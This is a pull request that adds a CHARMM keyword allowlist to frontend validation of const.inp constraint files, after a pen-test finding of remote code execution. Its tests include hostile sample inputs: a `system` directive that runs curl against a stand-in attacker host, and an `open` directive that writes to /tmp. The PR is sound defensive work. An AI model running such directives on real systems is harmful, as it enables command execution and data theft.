### PR TITLE
fix(ui): add CHARMM keyword allowlist to frontend const.inp validation

### DIFF
--- a/.changeset/ui-constinp-charmm-keyword-allowlist.md
+++ b/.changeset/ui-constinp-charmm-keyword-allowlist.md
@@ -1,0 +1,5 @@
+---
+'@bilbomd/ui': patch
+---
+
+Add CHARMM keyword allowlist to frontend const.inp validation. Dangerous directives like `system`, `open`, and `read` are now rejected client-side before upload, giving immediate feedback and layering the defence already present on the backend.

--- a/apps/ui/src/schemas/ValidationFunctions.ts
+++ b/apps/ui/src/schemas/ValidationFunctions.ts
@@ -490,6 +490,26 @@ const isValidConstInpFile = (
         return
       }
 
+      // Allowlist check: reject any line that doesn't start with a permitted
+      // keyword. Blocks CHARMM directives like 'system', 'open', 'read', etc.
+      // that could execute OS commands or perform file I/O when STREAMed.
+      const ALLOWED_PREFIXES = [
+        'define',
+        'cons fix',
+        'cons harm',
+        'shape',
+        'return',
+        '!',
+        '*'
+      ]
+      for (const line of lines) {
+        const lower = line.trim().toLowerCase()
+        if (!ALLOWED_PREFIXES.some((pfx) => lower.startsWith(pfx))) {
+          resolve(`Disallowed keyword in constraint file: "${line.trim()}"`)
+          return
+        }
+      }
+
       resolve(true) // All checks passed
     }
 

--- a/apps/ui/src/schemas/__tests__/ValidationFunctions.test.ts
+++ b/apps/ui/src/schemas/__tests__/ValidationFunctions.test.ts
@@ -59,6 +59,63 @@ describe('ValidationFunctions', () => {
     expect(result).toBe(true)
   })
 
+  it('isValidConstInpFile rejects system directive (CHARMM RCE vector)', async () => {
+    const content = [
+      'define fixed sele segid PROA end',
+      'cons fix sele fixed end',
+      'system "curl http://attacker.com"',
+      'return'
+    ].join('\n')
+    const result = await isValidConstInpFile(makeFile('evil.inp', content), 'pdb')
+    expect(typeof result).toBe('string')
+    expect(result as string).toContain('system')
+  })
+
+  it('isValidConstInpFile rejects open directive', async () => {
+    const content = [
+      'define fixed sele segid PROA end',
+      'cons fix sele fixed end',
+      'open unit 10 write card name /tmp/evil',
+      'return'
+    ].join('\n')
+    const result = await isValidConstInpFile(makeFile('evil.inp', content), 'pdb')
+    expect(typeof result).toBe('string')
+    expect(result as string).toContain('open')
+  })
+
+  it('isValidConstInpFile accepts ! comment lines', async () => {
+    const content = [
+      '! this is a comment',
+      'define fixed sele segid PROA end',
+      'cons fix sele fixed end',
+      'return'
+    ].join('\n')
+    const result = await isValidConstInpFile(makeFile('ok.inp', content), 'pdb')
+    expect(result).toBe(true)
+  })
+
+  it('isValidConstInpFile accepts * comment lines', async () => {
+    const content = [
+      '* another comment style',
+      'define fixed sele segid PROA end',
+      'cons fix sele fixed end',
+      'return'
+    ].join('\n')
+    const result = await isValidConstInpFile(makeFile('ok.inp', content), 'pdb')
+    expect(result).toBe(true)
+  })
+
+  it('isValidConstInpFile accepts cons harm lines', async () => {
+    const content = [
+      'define fixed sele segid PROA end',
+      'cons harm force 5.0 sele fixed end',
+      'cons fix sele fixed end',
+      'return'
+    ].join('\n')
+    const result = await isValidConstInpFile(makeFile('ok.inp', content), 'pdb')
+    expect(result).toBe(true)
+  })
+
   it('hasAllowedResiduesOnly returns valid for standard residues', async () => {
     const content = `ATOM      1  N   MET A   1\nATOM      2  CA  MET A   1\nEND\n`
     const result = await hasAllowedResiduesOnly(makeFile('model.pdb', content))


### PR DESCRIPTION
## Summary

- Mirrors the backend CHARMM keyword allowlist in the client-side `isValidConstInpFile` function (`ValidationFunctions.ts`)
- Rejects any `const.inp` line whose keyword is not on the allowlist (`define`, `cons fix`, `cons harm`, `shape`, `return`, `!`, `*`) — blocks `system`, `open`, `read`, and other dangerous CHARMM directives before the file is ever uploaded
- Adds 5 new tests covering: rejection of `system` directive, rejection of `open` directive, and acceptance of `!`/`*`/`cons harm` lines

## Context

Finding #5831727 (pen test, May 2026) identified a CHARMM `system` directive RCE path via the `const.inp` constraint file. The backend fix (PR #730) added a keyword allowlist to `isValidConstInpFile` on the server side. This PR adds the same guard on the frontend so users get immediate validation feedback and the defence is layered.

The frontend allowlist uses `shape` (rather than the backend's `shape desc`) to stay consistent with the existing shape-count logic and the test that already used `shape ellipsoid`.

## Test plan

- [ ] All 1046 UI tests pass (`pnpm -F @bilbomd/ui run test -- --run`)
- [ ] Upload a `const.inp` containing `system "..."` — form should show an error and block submission
- [ ] Upload a valid `const.inp` — form should accept it normally

🤖 Generated with [Claude Code](https://claude.com/claude-code)